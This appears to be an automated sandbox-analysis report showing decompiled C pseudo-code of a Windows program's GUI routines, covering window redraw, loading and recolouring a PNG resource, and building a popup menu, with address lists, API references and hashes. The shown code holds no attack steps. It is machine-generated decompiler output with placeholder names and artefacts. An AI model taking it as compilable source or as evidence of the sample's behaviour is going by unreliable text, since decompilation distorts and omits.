															__eflags = _t315;
															if(_t315 != 0) {
																_t318 =  *((intOrPtr*)( *_t315 + 0x1f4));
																L98:
																 *0xe17a64();
																 *_t318();
															}
															goto L33;
														}
													}
												}
											}
											goto L99;
										} else {
											_t318 = _v44;
											SendMessageA( *(_v44 + 0x20), 0xb, 1, _t150);
											goto L51;
										}
									}
								} else {
									_t318 =  *((intOrPtr*)(_t320 + 0x2f0));
									 *0xe17a64();
									_t235 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x2f0))))();
									__eflags = _t235;
									if(_t235 != 0) {
										E00D01CAB(_t315,  *(_t315 + 0xc0));
									}
									L33:
								}
							}
						}
					}
					return E00DDD50E(_t251, _t315, _t318);
				}
				L99:
			}

0x00d06275
0x00d06276
0x00d06277
0x00d06278
0x00d0627c
0x00d0627d
0x00d06280
0x00d06288
0x00d06377
0x00d0637a
0x00d0628e
0x00d0628e
0x00d06290
0x00d06291
0x00d06291
0x00d06294
0x00d06298
0x00000000
0x00000000
0x00d062a4
0x00d062b3
0x00d062ae
0x00d062b0
0x00d062b0
0x00d062b9
0x00d06347
0x00d0634f
0x00d062bf
0x00d062c1
0x00d062d2
0x00d062d8
0x00d062de
0x00d062e7
0x00d062fb
0x00d06306
0x00d06306
0x00d062fb
0x00d06315
0x00d06322
0x00d0633a
0x00000000
0x00000000
0x00d0633c
0x00d0633c
0x00d06342
0x00d06342
0x00000000
0x00000000
0x00000000
0x00d062c3
0x00d062c3
0x00d062cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00d062cb
0x00d062c1
0x00d0635a
0x00d06361
0x00d06367
0x00d06369
0x00d0636b
0x00d06370
0x00000000
0x00d06376
0x00000000
0x00d06376
0x00000000
0x00d06370
0x00d0637d
0x00d06382
0x00d06383
0x00d0638a
0x00d0638f
0x00d06391
0x00d06394
0x00d06396
0x00d064e2
0x00d064e2
0x00d0639c
0x00d0639c
0x00d063a2
0x00000000
0x00d063a8
0x00d063a8
0x00d063ae
0x00000000
0x00d063b4
0x00d063b4
0x00d063ba
0x00d063bc
0x00d063bf
0x00d063c1
0x00d063ee
0x00d063f7
0x00d063ff
0x00d06401
0x00d06403
0x00000000
0x00d06409
0x00d06416
0x00d0641b
0x00d0641d
0x00d06421
0x00d06422
0x00d06424
0x00d06426
0x00d0642c
0x00d0642e
0x00d06434
0x00d06441
0x00d06441
0x00d06441
0x00d06436
0x00d06436
0x00d0643c
0x00000000
0x00d0643e
0x00d0643e
0x00d0643e
0x00d0643c
0x00d06443
0x00d06443
0x00d0642c
0x00d06450
0x00d06455
0x00d0645c
0x00d0645f
0x00d06461
0x00d06463
0x00d0646e
0x00d0646e
0x00d06463
0x00d06474
0x00d0647b
0x00d0647d
0x00d06484
0x00d06490
0x00d06498
0x00d0649a
0x00d0649c
0x00d064a2
0x00d064a2
0x00d0649c
0x00d06484
0x00d064a9
0x00d064af
0x00d064be
0x00d064c6
0x00d064c8
0x00d064ca
0x00d064cd
0x00d064cf
0x00d064f0
0x00d064f7
0x00d064fd
0x00d06502
0x00d06502
0x00d06508
0x00d0650e
0x00d06534
0x00d0654b
0x00d0655c
0x00d0655c
0x00d06571
0x00d06577
0x00d06579
0x00d0657b
0x00d06582
0x00d06586
0x00d06588
0x00d06588
0x00d065a7
0x00d065aa
0x00d065ab
0x00d065ad
0x00d065bd
0x00d065c3
0x00d065c5
0x00d065c7
0x00d065c9
0x00d065d2
0x00d065d9
0x00d065ef
0x00d065f7
0x00d065fe
0x00d0660d
0x00d06613
0x00d06615
0x00d06617
0x00d06619
0x00d06630
0x00000000
0x00d0661b
0x00d06625
0x00d0662a
0x00d0662c
0x00d06632
0x00d0663e
0x00d0663e
0x00d0662c
0x00d06647
0x00d06647
0x00d06647
0x00d0664b
0x00d0664e
0x00d0664e
0x00d065c9
0x00d06653
0x00d0665a
0x00d06665
0x00d0666f
0x00d06675
0x00d06677
0x00d0665c
0x00d0665c
0x00d06663
0x00000000
0x00000000
0x00d06663
0x00d06680
0x00d06689
0x00d0668f
0x00d06693
0x00d06696
0x00d0669e
0x00d066a3
0x00d066a7
0x00d066a8
0x00d066aa
0x00d066c1
0x00d066c8
0x00d066ca
0x00d066cc
0x00d066cc
0x00d066ac
0x00d066b8
0x00d066ba
0x00d066ba
0x00d066aa
0x00d066d1
0x00d066d7
0x00d066d9
0x00d066db
0x00d066df
0x00d066e6
0x00d066f4
0x00d066f9
0x00d066fb
0x00d06742
0x00d06742
0x00d066fd
0x00d066fd
0x00d06700
0x00d06702
0x00000000
0x00d06704
0x00d0670c
0x00d06714
0x00d0671e
0x00d0672e
0x00d06734
0x00d06736
0x00d0673e
0x00d0673e
0x00d06738
0x00d06738
0x00d0673c
0x00000000
0x00000000
0x00000000
0x00000000
0x00d0673c
0x00d06736
0x00d06702
0x00d0674c
0x00d0674c
0x00d066df
0x00d06759
0x00d06761
0x00d06767
0x00d06769
0x00d0676b
0x00d06772
0x00d06774
0x00d06778
0x00d0677a
0x00d06786
0x00d0678c
0x00d0678e
0x00d06794
0x00d067d5
0x00d067da
0x00d06796
0x00d06796
0x00d06799
0x00d0679c
0x00d0679f
0x00d067a9
0x00d067c4
0x00d067c9
0x00d067ce
0x00d067d0
0x00d067d0
0x00d067df
0x00d067df
0x00d06778
0x00d067e5
0x00d067eb
0x00d067ee
0x00000000
0x00d067f4
0x00d067f4
0x00d067f6
0x00000000
0x00d067fc
0x00d067ff
0x00d06807
0x00d0681c
0x00d0681e
0x00d06823
0x00d06825
0x00000000
0x00d0682b
0x00d06837
0x00d06844
0x00d06848
0x00d06850
0x00d06859
0x00d0685b
0x00d0685e
0x00d06864
0x00d06884
0x00d0688a
0x00d0688c
0x00000000
0x00d06892
0x00d06894
0x00000000
0x00d06894
0x00d06866
0x00d06869
0x00d0686f
0x00d06871
0x00d06879
0x00d0689a
0x00d0689c
0x00d068a4
0x00d068a4
0x00000000
0x00d06871
0x00d06864
0x00d06825
0x00d067f6
0x00000000
0x00d064d1
0x00d064d1
0x00d064dc
0x00000000
0x00d064dc
0x00d064cf
0x00d063c3
0x00d063c3
0x00d063cb
0x00d063d3
0x00d063d5
0x00d063d7
0x00d063e1
0x00d063e1
0x00d063e6
0x00d063e8
0x00d063c1
0x00d063ae
0x00d063a2
0x00d064e9
0x00d064e9
0x00000000

APIs

SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,?,?,?,?,00D05F4C,?,?,?), ref: 00D06315
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000014,?,?,?,?,?,00D05F4C,?,?,?), ref: 00D0634F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D05F4C,?,?,?,?,?,?), ref: 00D0635A
UpdateWindow.USER32(?), ref: 00D06361
__EH_prolog3_GS.LIBCMT ref: 00D0638A
GetParent.USER32(00000000), ref: 00D06449
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00D0646E
SendMessageA.USER32(00000000,0000000B,00000001,00000000), ref: 00D064DC
BringWindowToTop.USER32 ref: 00D06502
GetParent.USER32(00000000), ref: 00D06590
GetParent.USER32(?), ref: 00D0661E
RedrawWindow.USER32(?,00000000,00000000,00000401,?,?,?,00D05F4C,?,?,?,?,?,?), ref: 00D0663E
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,00000000,?,?,?,00D05F4C,?,?,?,?,?), ref: 00D06680
UpdateWindow.USER32(00000000), ref: 00D06689
GetSystemMenu.USER32(00000000,00000000), ref: 00D066ED
GetMenuItemInfoA.USER32 ref: 00D0672E
SendMessageA.USER32(00000000,0000000B,00000001,00000000), ref: 00D06786
GetWindowRect.USER32 ref: 00D067A9
GetParent.USER32(00000000), ref: 00D067B2
RedrawWindow.USER32(00000000,00000000,00000000,00000185,?,?,?,00000000,?,?,?,00D05F4C,?,?,?,?), ref: 00D067DF

Strings

0, xrefs: 00D06714
0?, xrefs: 00D06699

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Parent$MessageRectSend$InvalidateMenuRedrawUpdate$BringH_prolog3_InfoItemSystem
String ID: 0$0?
API String ID: 4264549139-3563620262
Opcode ID: 4a9b6d77548846e0d665dc8d5e6a138c0682ca65b3808cc920beb2e922448cf9
Instruction ID: 099233a67f11816f1e6f51a4029d3b1c1402b9fbfb20009d7ffd9d078ce945e1
Opcode Fuzzy Hash: 4a9b6d77548846e0d665dc8d5e6a138c0682ca65b3808cc920beb2e922448cf9
Instruction Fuzzy Hash: E102A031604612AFDB259F64CC89BADB7B5FF48710F184269F859A72D0DB70ED24CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDD51E Relevance: 37.8, APIs: 25, Instructions: 332
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CDD51E(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, CHAR* _a4, CHAR* _a8, int _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v276;
				char _v532;
				char _v788;
				char _v1044;
				char _v1304;
				CHAR* _v1308;
				int _v1312;
				void* _v1316;
				signed int _v1320;
				struct HDC__* _v1332;
				char _v1336;
				int _v1340;
				struct HDC__* _v1352;
				char _v1356;
				intOrPtr _v1360;
				void* _v1364;
				void* _v1368;
				intOrPtr _v1374;
				int _v1384;
				int _v1388;
				char _v1392;
				signed int _v1398;
				char _v1416;
				void* _t104;
				void* _t105;
				void* _t112;
				void* _t113;
				void* _t115;
				int _t119;
				signed char _t122;
				signed int _t123;
				void* _t124;
				void* _t127;
				int _t136;
				int _t137;
				int _t140;
				int _t141;
				int _t145;
				int _t148;
				long _t154;
				long _t155;
				CHAR* _t162;
				void* _t163;
				void* _t164;
				int _t166;
				int _t189;
				int _t190;
				int _t199;
				int _t207;
				void* _t211;
				void* _t215;
				struct HRSRC__* _t217;
				int _t221;
				struct HINSTANCE__* _t226;
				signed int _t228;
				signed int* _t232;
				int _t233;
				void* _t243;

				_t243 = __fp0;
				_t216 = __edi;
				_t215 = __edx;
				_push(0x57c);
				E00DDD55F(0xe0a8cb, __ebx, __edi, __esi);
				_t187 = __ecx;
				_v1360 = __ecx;
				_t225 = _a8;
				if( *((intOrPtr*)(__ecx + 0x28)) == 0) {
					__eflags = _t225;
					if(__eflags == 0) {
						E00CAA4E7(__ecx, __ecx, __edi, _t225, __eflags);
						asm("int3");
						_push(__ecx);
						_push(__ecx);
						_push(_t225);
						_t226 = _a4;
						_v12 = __ecx;
						_push(__edi);
						__eflags = _t226;
						if(__eflags == 0) {
							_t226 =  *(E00CACEEE(__ecx, __edi, _t226, __eflags) + 0xc);
						}
						_t217 = FindResourceA(_t226, _a4, "PNG");
						__eflags = _t217;
						if(_t217 == 0) {
							L54:
							_t104 = 0;
							__eflags = 0;
						} else {
							_t105 = LoadResource(_t226, _t217);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L54;
							} else {
								_t189 = LockResource(_t105);
								__eflags = _t189;
								if(_t189 == 0) {
									goto L54;
								} else {
									_push(SizeofResource(_t226, _t217));
									_push(_t189);
									_t104 = E00CDDA38(_t189, _v8, _t215, _t217, _t226, _t243);
								}
							}
						}
						return _t104;
					} else {
						E00CB83BD(__edi, __ecx + 0x8c);
						_push(_t225);
						E00CA2ABC(__ecx,  &_v1308, __edi, _t225, __eflags);
						_v4 = _v4 & 0x00000000;
						_t112 = E00CA7BFD( &_v1308, 0xe19188, 0);
						__eflags = _t112 - 0xffffffff;
						if(_t112 == 0xffffffff) {
							_t163 = E00CA7BFD( &_v1308, "/", 0);
							__eflags = _t163 - 0xffffffff;
							if(_t163 == 0xffffffff) {
								_t164 = E00CA7BFD( &_v1308, 0xe19c28, 0);
								__eflags = _t164 - 0xffffffff;
								if(_t164 == 0xffffffff) {
									_t166 = GetModuleFileNameA(0,  &_v1304, 0x104);
									__eflags = _t166;
									if(_t166 != 0) {
										E00DEDD45( &_v1304,  &_v1312, 3,  &_v1044, 0x100, 0, 0, 0, 0);
										__eflags = 0;
										E00DEDD45(_t225, 0, 0, 0, 0,  &_v788, 0x100,  &_v532, 0x100);
										_push( &_v532);
										_push( &_v788);
										E00DEDB0F( &_v276, 0x104,  &_v1312,  &_v1044);
										_push(E00DEC1A0( &_v276));
										E00CA2CD7(_t187,  &_v1308, 0x100, _t225,  &_v276);
									}
								}
							}
						}
						__eflags = _a12;
						if(__eflags <= 0) {
							L12:
							_t228 =  *(_t187 + 0x34);
							_t216 = _v1308;
							_t113 = E00CACEEE(_t187, _t216, _t228, __eflags);
							asm("sbb esi, esi");
							_t115 = LoadImageA( *(_t113 + 8), _t216, 0, 0, 0, ( ~_t228 & 0x00001000) + 0x2010);
							_t225 = _t187 + 0x8c;
							 *_t225 = _t115;
							__eflags = _t115;
							if(_t115 == 0) {
								goto L11;
							} else {
								_push( &_v1416);
								_t199 = 0x18;
								_t119 = GetObjectA(_t115, _t199, ??);
								__eflags = _t119;
								if(_t119 != 0) {
									 *((intOrPtr*)(_t187 + 0x18)) = 1;
									E00CA68A8(_t187 + 0x98,  &_v1308);
									_t122 = GetFileAttributesA(_v1308);
									__eflags = _t122 & 0x00000001;
									if((_t122 & 0x00000001) != 0) {
										 *((intOrPtr*)(_t187 + 0x24)) = 1;
									}
									_t123 = _v1398 & 0x0000ffff;
									 *(_t187 + 8) = _t123;
									_t216 = 0x20;
									__eflags = _t123 - 8;
									if(_t123 > 8) {
										__eflags = _t123 - _t216;
										if(_t123 < _t216) {
											__eflags =  *_t225;
											if( *_t225 != 0) {
												E00CB9032( &_v1336);
												_v4 = 1;
												E00CB9B84(_t187,  &_v1336, CreateCompatibleDC(0));
												_push( &_v1392);
												_t136 = 0x18;
												_t137 = GetObjectA( *_t225, _t136, ??);
												__eflags = _t137;
												if(_t137 != 0) {
													__eflags =  *_t225;
													if( *_t225 != 0) {
														_t216 = SelectObject(_v1332,  *_t225);
														__eflags = _t216;
														if(_t216 != 0) {
															_t140 = _v1384;
															_t207 = _v1388;
															_v1312 = _t207;
															_v1340 = _t140;
															_t141 = CreateCompatibleBitmap(_v1332, _t207, _t140);
															_v1316 = _t141;
															__eflags = _t141;
															if(_t141 != 0) {
																E00CB9032( &_v1356);
																_v4 = 2;
																E00CB9B84(_t187,  &_v1356, CreateCompatibleDC(_v1332));
																_t145 = SelectObject(_v1352, _v1316);
																_v1368 = _t145;
																__eflags = _t145;
																if(_t145 != 0) {
																	BitBlt(_v1352, 0, 0, _v1312, _v1340, _v1332, 0, 0, 0xcc0020);
																	_v1320 = _v1320 & 0x00000000;
																	_t148 = _v1312;
																	__eflags = _t148;
																	if(_t148 > 0) {
																		_t190 = _v1320;
																		_v1364 = _t216;
																		_t221 = _v1340;
																		do {
																			_t233 = 0;
																			__eflags = _t221;
																			if(_t221 > 0) {
																				do {
																					_t154 = GetPixel(_v1352, _t190, _t233);
																					_t211 = 0x18;
																					_v1320 = _t154;
																					__eflags = _v1374 - _t211;
																					if(_v1374 != _t211) {
																						L33:
																						_t155 = E00CDDFB7(_t221, _t233, _t154, 0);
																					} else {
																						__eflags =  *0xe68308;
																						if(__eflags != 0) {
																							goto L33;
																						} else {
																							_t155 = E00CDE05F(_t215, __eflags, _t243, _t154);
																						}
																					}
																					__eflags = _v1320 - _t155;
																					if(_v1320 != _t155) {
																						SetPixel(_v1352, _t190, _t233, _t155);
																					}
																					_t233 = _t233 + 1;
																					__eflags = _t233 - _t221;
																				} while (_t233 < _t221);
																				_t148 = _v1312;
																			}
																			_t190 = _t190 + 1;
																			__eflags = _t190 - _t148;
																		} while (_t190 < _t148);
																		_t187 = _v1360;
																		_t216 = _v1364;
																		_t225 = _t187 + 0x8c;
																	}
																	SelectObject(_v1352, _v1368);
																	SelectObject(_v1332, _t216);
																	DeleteObject( *_t225);
																	 *_t225 = _v1316;
																} else {
																	SelectObject(_v1332, _t216);
																	DeleteObject(_v1316);
																}
																E00CB91A4( &_v1356);
															} else {
																SelectObject(_v1332, _t216);
															}
														}
													}
												}
												_v4 = 0;
												E00CB91A4( &_v1336);
											}
										}
									}
									_t124 = 0x20;
									__eflags = _v1398 - _t124;
									if(_v1398 >= _t124) {
										E00CDE938(_t216,  *_t225,  *((intOrPtr*)(_t187 + 0x3c)));
									}
									E00CDF694(_t187);
									_t232 = _t187 + 0x90;
									E00CB83BD(_t216, _t232);
									 *_t232 =  *_t232 & 0x00000000;
									_t225 = _t187 + 0x94;
									_t127 = E00CB83BD(_t216, _t225);
									 *_t225 =  *_t225 & 0x00000000;
									E00CA2975(_t127,  &(_v1308[0xfffffffffffffff0]));
									__eflags = 1;
								} else {
									_t115 = DeleteObject( *_t225);
									 *_t225 =  *_t225 & 0x00000000;
									goto L11;
								}
							}
						} else {
							_t216 = CreateFileA(_t225, 0x80000000, 1, 0, 3, 0, 0);
							__eflags = _t216 - 0xffffffff;
							if(__eflags == 0) {
								goto L12;
							} else {
								_t162 = GetFileSize(_t216, 0);
								_t225 = _t162;
								_t115 = CloseHandle(_t216);
								__eflags = _t162 - _a12;
								if(__eflags <= 0) {
									goto L12;
								} else {
									L11:
									E00CA2975(_t115, _v1308 - 0x10);
									goto L1;
								}
							}
						}
						goto L46;
					}
				} else {
					L1:
					L46:
					return E00DDD50E(_t187, _t216, _t225);
				}
			}

0x00cdd51e
0x00cdd51e
0x00cdd51e
0x00cdd51e
0x00cdd528
0x00cdd52d
0x00cdd52f
0x00cdd539
0x00cdd53c
0x00cdd545
0x00cdd547
0x00cdd9ce
0x00cdd9d3
0x00cdd9d7
0x00cdd9d8
0x00cdd9d9
0x00cdd9da
0x00cdd9dd
0x00cdd9e0
0x00cdd9e1
0x00cdd9e3
0x00cdd9ea
0x00cdd9ea
0x00cdd9fc
0x00cdd9fe
0x00cdda00
0x00cdda2f
0x00cdda2f
0x00cdda2f
0x00cdda02
0x00cdda04
0x00cdda0a
0x00cdda0c
0x00000000
0x00cdda0e
0x00cdda15
0x00cdda17
0x00cdda19
0x00000000
0x00cdda1b
0x00cdda26
0x00cdda27
0x00cdda28
0x00cdda28
0x00cdda19
0x00cdda0c
0x00cdda35
0x00cdd54d
0x00cdd554
0x00cdd559
0x00cdd560
0x00cdd565
0x00cdd576
0x00cdd57b
0x00cdd57e
0x00cdd592
0x00cdd597
0x00cdd59a
0x00cdd5ac
0x00cdd5b1
0x00cdd5b4
0x00cdd5c7
0x00cdd5cd
0x00cdd5cf
0x00cdd5f8
0x00cdd60d
0x00cdd614
0x00cdd622
0x00cdd629
0x00cdd644
0x00cdd65e
0x00cdd666
0x00cdd666
0x00cdd5cf
0x00cdd5b4
0x00cdd59a
0x00cdd66b
0x00cdd66f
0x00cdd6b7
0x00cdd6b7
0x00cdd6ba
0x00cdd6c0
0x00cdd6c7
0x00cdd6e0
0x00cdd6e6
0x00cdd6ec
0x00cdd6ee
0x00cdd6f0
0x00000000
0x00cdd6f2
0x00cdd6f8
0x00cdd6fb
0x00cdd6fe
0x00cdd704
0x00cdd706
0x00cdd725
0x00cdd728
0x00cdd733
0x00cdd739
0x00cdd73b
0x00cdd73d
0x00cdd73d
0x00cdd740
0x00cdd747
0x00cdd74c
0x00cdd74d
0x00cdd750
0x00cdd756
0x00cdd758
0x00cdd75e
0x00cdd761
0x00cdd76d
0x00cdd774
0x00cdd785
0x00cdd790
0x00cdd793
0x00cdd797
0x00cdd79d
0x00cdd79f
0x00cdd7a5
0x00cdd7a8
0x00cdd7bc
0x00cdd7be
0x00cdd7c0
0x00cdd7c6
0x00cdd7cc
0x00cdd7da
0x00cdd7e0
0x00cdd7e6
0x00cdd7ec
0x00cdd7f2
0x00cdd7f4
0x00cdd80e
0x00cdd819
0x00cdd82a
0x00cdd83b
0x00cdd841
0x00cdd847
0x00cdd849
0x00cdd88c
0x00cdd892
0x00cdd899
0x00cdd89f
0x00cdd8a1
0x00cdd8a7
0x00cdd8ad
0x00cdd8b3
0x00cdd8b9
0x00cdd8b9
0x00cdd8bb
0x00cdd8bd
0x00cdd8bf
0x00cdd8c7
0x00cdd8cf
0x00cdd8d0
0x00cdd8d6
0x00cdd8dd
0x00cdd8f0
0x00cdd8f3
0x00cdd8df
0x00cdd8df
0x00cdd8e6
0x00000000
0x00cdd8e8
0x00cdd8e9
0x00cdd8e9
0x00cdd8e6
0x00cdd8f8
0x00cdd8fe
0x00cdd909
0x00cdd909
0x00cdd90f
0x00cdd910
0x00cdd910
0x00cdd914
0x00cdd914
0x00cdd91a
0x00cdd91b
0x00cdd91b
0x00cdd91f
0x00cdd925
0x00cdd92b
0x00cdd92b
0x00cdd93d
0x00cdd94a
0x00cdd952
0x00cdd95e
0x00cdd84b
0x00cdd852
0x00cdd85e
0x00cdd85e
0x00cdd966
0x00cdd7f6
0x00cdd7fd
0x00cdd7fd
0x00cdd7f4
0x00cdd7c0
0x00cdd7a8
0x00cdd971
0x00cdd975
0x00cdd975
0x00cdd761
0x00cdd758
0x00cdd97c
0x00cdd97d
0x00cdd984
0x00cdd98b
0x00cdd98b
0x00cdd992
0x00cdd997
0x00cdd99e
0x00cdd9a3
0x00cdd9a6
0x00cdd9ad
0x00cdd9b8
0x00cdd9be
0x00cdd9c5
0x00cdd708
0x00cdd70a
0x00cdd710
0x00000000
0x00cdd710
0x00cdd706
0x00cdd671
0x00cdd686
0x00cdd688
0x00cdd68b
0x00000000
0x00cdd68d
0x00cdd690
0x00cdd697
0x00cdd699
0x00cdd69f
0x00cdd6a2
0x00000000
0x00cdd6a4
0x00cdd6a4
0x00cdd6ad
0x00000000
0x00cdd6ad
0x00cdd6a2
0x00cdd68b
0x00000000
0x00cdd66f
0x00cdd53e
0x00cdd53e
0x00cdd9c6
0x00cdd9cb
0x00cdd9cb

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDD528
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00E19C28,00000000,00E4BD4C,00000000,00E19188,00000000,?,?,0000057C,00CDE7A1,?,00000000,00000038), ref: 00CDD5C7
_strlen.LIBCMT ref: 00CDD650
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00E19188,00000000,?,?,0000057C,00CDE7A1,?,00000000,00000038), ref: 00CDD680

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: File$CreateH_prolog3_ModuleName_strlen
String ID:
API String ID: 1066648201-0
Opcode ID: fbb32a0721f8991239159500e92500c3ee33dd8510efc79eb4dfd6688cc272f4
Instruction ID: 10f7c17ccf05fc518905395d4da283f7e901e3cb3454bb64082d17ca7717d591
Opcode Fuzzy Hash: fbb32a0721f8991239159500e92500c3ee33dd8510efc79eb4dfd6688cc272f4
Instruction Fuzzy Hash: F2D19D71900618AFDB21AF60DC49FEB77B8EF04702F104195FA5AA2291DB319F85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D0548F Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 274
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00D0548F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v4;
				long _v16;
				char _v20;
				CHAR* _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				signed int _v40;
				char _v44;
				void* _t92;
				intOrPtr _t106;
				int _t114;
				long _t119;
				struct HWND__* _t121;
				void* _t130;
				int _t134;
				int _t138;
				int _t154;
				intOrPtr* _t159;
				intOrPtr* _t161;
				signed int _t163;
				RECT* _t164;
				void* _t171;
				void* _t172;
				void* _t177;
				intOrPtr* _t186;
				intOrPtr _t191;
				void* _t203;
				signed int _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				void* _t211;
				void* _t213;
				CHAR* _t214;
				signed int _t218;
				void* _t223;
				intOrPtr* _t226;

				_t203 = __edx;
				_push(0x20);
				_t92 = E00DDD52C(0xe0c17a, __ebx, __edi, __esi);
				_t159 = __ecx;
				_v36 = __ecx;
				if( *0xe88600 == 0) {
					L26:
					return E00DDD4FA(_t92);
				} else {
					_v40 = _v40 & 0x00000000;
					_v44 = 0xe19a6c;
					_v4 = _v4 & 0x00000000;
					E00CBA971(_t159,  &_v44, __edi, CreatePopupMenu());
					_t205 = 0;
					if( *((intOrPtr*)(_t159 + 0xbc)) <= 0) {
						L20:
						_t206 =  *0xe88600; // 0x0
						 *0xe17a64(_v40, _a8, _a12, _v36, 0);
						_t211 =  *((intOrPtr*)( *((intOrPtr*)( *_t206 + 0x14))))();
						if(IsWindow( *(_t159 + 0x20)) != 0) {
							_t171 = 0xffffff9c;
							_t172 = _t171 - _t211;
							if(_t172 >= 0) {
								_t161 = _v36;
								if(_t172 <  *((intOrPtr*)(_t161 + 0xbc))) {
									 *(_t161 + 0x24c) = 1;
									 *0xe17a64(_t172);
									 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x214))))();
									 *(_t161 + 0x24c) =  *(_t161 + 0x24c) & 0x00000000;
								}
							}
							E00CAF98A(0xe68480);
						}
						_v4 = 4;
						_v44 = 0xe19a6c;
						_t92 = E00CBA9D9( &_v44);
						goto L26;
					} else {
						_t213 = 0xe22678;
						do {
							_t106 =  *((intOrPtr*)(E00CBFD51(_t159, _t159 + 0x94, _t205, _t213, _t205)));
							_v32 = _t106;
							_t230 =  *((intOrPtr*)(_t106 + 0x34));
							if( *((intOrPtr*)(_t106 + 0x34)) == 0) {
								goto L19;
							} else {
								_t177 = 0xffffff9c;
								_v28 = _t177 - _t205;
								_v24 = E00CA68F8(_t159, _t205, _t213) + 0x10;
								 *_t226 = 0xe22674;
								_v4 = 1;
								E00CA66A0( &_v24, _t230, _t213,  *((intOrPtr*)(_t106 + 4)) - 0x10);
								E00CA66A0( &_v24, _t230, 0xe1f238, _t213);
								E00CA66A0( &_v24, _t230, 0xe22674, _t213);
								_v16 = _v16 & 0x00000000;
								_t114 = GetMenuItemCount(_v40);
								_t214 = _v24;
								if(_t114 <= 0) {
									L8:
									AppendMenuA(_v40, 0, _v28, _t214);
									goto L9;
								} else {
									while(1) {
										E00CA67E1( &_v20);
										_v4 = 2;
										_t186 =  &_v44;
										E00CBAF59(_t186, _t214, _v16,  &_v20, 0x400);
										if(_v20 == 0) {
											break;
										}
										if(E00DEFE3A(_t214, _v20) < 0) {
											_t154 = InsertMenuA(_v40, _v16, 0x400, _v28, _t214);
											_v4 = 1;
											E00CA2975(_t154, _v20 - 0x10);
											L9:
											_t117 =  *(_v32 + 0x20);
											if(_t117 != 0 &&  *(_t117 + 0x20) != 0) {
												_t119 = SendMessageA( *(_t117 + 0x20), 0x7f, 0, 0);
												_v16 = _t119;
												if(_t119 == 0) {
													_t121 =  *(_v32 + 0x20);
													_t238 = _t121;
													if(_t121 != 0) {
														_t121 =  *(_t121 + 0x20);
													}
													_v16 = GetClassLongA(_t121, 0xffffffde);
												}
												 *((intOrPtr*)(E00CD5246(_t159, _t203, _t205, _t238, _v28))) = _v16;
											}
											_v4 = 0;
											E00CA2975(_t117, _t214 - 0x10);
											_t213 = 0xe22678;
											goto L19;
										} else {
											_v4 = 1;
											E00CA2975(_t153, _v20 - 0x10);
											_v16 = _v16 + 1;
											if(_v16 < GetMenuItemCount(_v40)) {
												continue;
											} else {
												goto L8;
											}
										}
										goto L40;
									}
									E00CA20D1(_t186, 0x80004005);
									asm("int3");
									_t207 = _t186;
									E00CB236A(_t159, _t186, __eflags, _t205);
									 *0xe17a64(_t214, _t159, _t223);
									_t130 =  *((intOrPtr*)( *((intOrPtr*)( *_t207 + 0x248))))();
									_t163 = _v0 - _t130 + GetSystemMetrics(2) * 2 + _t130 + GetSystemMetrics(2) * 2;
									_t134 = GetSystemMetrics(0x15);
									__eflags = _t163 - _t134 + _t134;
									if(_t163 > _t134 + _t134) {
										asm("cdq");
										_t218 = _t163 - _t203 >> 1;
										_t138 = GetSystemMetrics(0x15);
										__eflags = _t218 - _t138 + _t138;
										if(_t218 <= _t138 + _t138) {
											_t218 = _t163;
										}
										_t164 = 0;
										__eflags = 0;
									} else {
										_t164 = 0;
										_t218 = 0;
									}
									 *(_t207 + 0x2b4) = _t218;
									__eflags =  *((intOrPtr*)(_t207 + 0x254)) - _t164;
